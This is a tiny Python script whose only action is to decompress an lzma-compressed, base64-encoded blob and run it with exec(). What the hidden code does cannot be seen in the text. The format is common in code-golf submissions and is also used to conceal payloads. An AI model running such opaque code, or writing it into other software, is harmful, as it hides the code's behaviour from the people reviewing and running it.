import lzma,base64
exec(lzma.decompress(base64.b64decode(b'/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4AEwAL5dADMciiJvqlzh/FMS3SwNVnRrZ7XT+J99DSntDijcny/D2PC5AYcpvek/pTq4C+xnWRBf8e4oKgWLkzNCwF18rcG+USWhJeFaZ5H29a/ymfH4JieybxcXVA30WbVyiZdNDoL9RYLQUL6fy/O/3uClCEb1NAF2iMvIR3wHFIY6zB51EcCz52pxP5FOk853gSEiDTWgDfGyM9OmN+nzlpGqOEshPk5und0EWUZBWGFEBnXA1DAwRPpBZKoUKswNJCAAAAC3vwvmg958WwAB2gGxAgAAtT/a67HEZ/sCAAAAAARZWg==')))